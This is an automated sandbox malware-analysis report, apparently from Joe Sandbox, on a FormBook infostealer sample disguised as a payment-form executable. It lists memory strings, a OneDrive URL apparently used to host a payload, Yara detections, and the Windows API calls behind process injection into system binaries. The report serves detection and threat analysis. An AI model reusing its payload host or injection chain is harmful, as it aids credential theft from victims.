          Source: Form_TT_EUR57,890.exe, 00000001.00000003.341319212.00000000007A2000.00000004.00000001.sdmp, Fdhlajk.exe, 00000010.00000003.400962283.00000000008A4000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
          Source: Fdhlajk.exe, 00000010.00000003.400923077.0000000000899000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000008.00000000.468015221.000000000095C000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
          Source: Fdhlajk.exe, 00000010.00000003.400962283.00000000008A4000.00000004.00000001.sdmp | String found in binary or memory: https://pxqklq.sn.files.1drv.com/y4mAqf93vESEsLAwmv3Js3T3TVTVs9n9BMjWgdbjboex1CPBHIn5H8wAnTdclH8voCt
          Source: rundll32.exe, 0000001C.00000002.865949851.0000000005342000.00000004.00000001.sdmp | String found in binary or memory: https://www.cdnbest.com/?code=404
          Source: Yara match | File source: Process Memory Space: Form_TT_EUR57,890.exe PID: 6840, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: Fdhlajk.exe PID: 6148, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: Fdhlajk.exe PID: 6496, type: MEMORYSTR

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 4.0.logagent.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.logagent.exe.10410000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 29.2.secinit.exe.10410000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 26.0.mshta.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.logagent.exe.10410000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 26.2.mshta.exe.10410000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 29.0.secinit.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 26.0.mshta.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 29.0.secinit.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 29.2.secinit.exe.10410000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 26.2.mshta.exe.10410000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.0.logagent.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000001C.00000002.861918517.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000001A.00000002.495868043.0000000002910000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000001A.00000002.496343429.0000000002C80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000001C.00000002.863420934.0000000002DD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000001A.00000000.467594845.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000001D.00000002.505021347.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.513499123.0000000004600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000001C.00000002.862165299.0000000000CB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000001A.00000002.497909086.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000023.00000002.512339844.0000000002940000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000000.380848795.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.512824544.0000000002B50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.515478166.0000000010410000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 4.0.logagent.exe.10410000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.logagent.exe.10410000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 4.2.logagent.exe.10410000.5.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.logagent.exe.10410000.5.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 29.2.secinit.exe.10410000.2.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 29.2.secinit.exe.10410000.2.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 26.0.mshta.exe.10410000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 26.0.mshta.exe.10410000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 4.2.logagent.exe.10410000.5.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.logagent.exe.10410000.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 26.2.mshta.exe.10410000.5.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 26.2.mshta.exe.10410000.5.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 29.0.secinit.exe.10410000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 29.0.secinit.exe.10410000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 26.0.mshta.exe.10410000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 26.0.mshta.exe.10410000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 29.0.secinit.exe.10410000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 29.0.secinit.exe.10410000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 29.2.secinit.exe.10410000.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 29.2.secinit.exe.10410000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 26.2.mshta.exe.10410000.5.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 26.2.mshta.exe.10410000.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 4.0.logagent.exe.10410000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.logagent.exe.10410000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001C.00000002.861918517.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001C.00000002.861918517.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001A.00000002.495868043.0000000002910000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001A.00000002.495868043.0000000002910000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001A.00000002.496343429.0000000002C80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001A.00000002.496343429.0000000002C80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001C.00000002.863420934.0000000002DD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001C.00000002.863420934.0000000002DD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001A.00000000.467594845.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001A.00000000.467594845.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001D.00000002.505021347.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001D.00000002.505021347.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.513499123.0000000004600000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.513499123.0000000004600000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001C.00000002.862165299.0000000000CB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001C.00000002.862165299.0000000000CB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001A.00000002.497909086.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001A.00000002.497909086.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000023.00000002.512339844.0000000002940000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000023.00000002.512339844.0000000002940000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.380848795.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.380848795.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.512824544.0000000002B50000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.512824544.0000000002B50000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.515478166.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.515478166.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049AB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049AAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A96D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049AA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049AA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049AA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030EA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030EA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030EA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E96D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030EAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030EB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_104281C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_10428270 NtReadFile,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_104282F0 NtClose,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_104283A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_104281BA NtCreateFile,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_1042826B NtReadFile,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_104282EA NtClose,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_1042839C NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C9237F
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C92075
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C921F8
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C92627
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0497B090
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0497841F
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A21002
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0496F900
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04960D20
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04984120
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A31D55
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04986E30
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0499EBB0
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 16_3_02CB237F
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 16_3_02CB2075
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 16_3_02CB21F8
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 16_3_02CB2627
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 19_3_02CB237F
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 19_3_02CB2075
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 19_3_02CB21F8
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 19_3_02CB2627
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03172B28
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030DEBB0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0316DBD2
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03171FF1
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030C6E30
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_031722AE
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03172EF7
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030AF900
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03172D07
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A0D20
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030C4120
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03171D55
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D2581
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_031725DD
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030BD5E0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03161002
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030B841F
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030BB090
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D20A0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_031720A8
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_031728EC
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_10411030
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_1042B889
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_10418C60
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_1042CCAE
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_1042C55C
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_1042BD2F
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_10412D87
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_10412D90
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_10412FB0
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: String function: 02CA0668 appears 40 times
          Source: C:\Windows\SysWOW64\mshta.exeCode function: String function: 030AB150 appears 35 times
          Source: Form_TT_EUR57,890.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
